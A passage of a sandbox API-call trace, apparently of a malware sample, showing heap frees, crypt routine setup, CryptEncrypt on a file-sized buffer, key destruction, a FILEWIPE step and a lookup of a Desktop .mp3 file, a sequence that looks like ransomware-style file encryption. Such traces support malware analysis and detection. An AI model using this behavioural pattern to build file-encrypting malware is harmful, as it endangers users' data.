wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0161.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.058] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.058] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.058] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.058] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.058] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.058] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.059] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x2520, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x2530) returned 1 [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.059] CharLowerBuffW (in: lpsz="byte[9521]", cchLength=0xa | out: lpsz="byte[9521]") returned 0xa [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.059] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.059] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9e76b8*, pdwDataLen=0x87e820*=0x2520, dwBufLen=0x2530 | out: pbData=0x9e76b8*, pdwDataLen=0x87e820*=0x2530) returned 1 [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.060] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.060] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.060] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.060] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.060] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.060] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.063] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.063] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.063] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.063] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.064] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0161.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.064] CryptDestroyKey (hKey=0x90af98) returned 1 [0161.064] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.064] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.064] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.064] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.064] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.064] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.064] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.064] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.064] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.065] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.065] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.065] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.065] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.065] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.065] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.065] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0161.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.065] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.065] FreeLibrary (hLibModule=0x74f20000) returned 1 [0161.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.065] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.066] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.067] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.068] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.068] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0161.069] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.069] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0xa6ca5750, ftLastWriteTime.dwHighDateTime=0x1d5df94, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 0x90ae18 [0161.069] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.069] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.069] CharLowerBuffW (in: lpsz="byte[9504]", cchLength=0xa | out: lpsz="byte[9504]") returned 0xa [0161.070] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 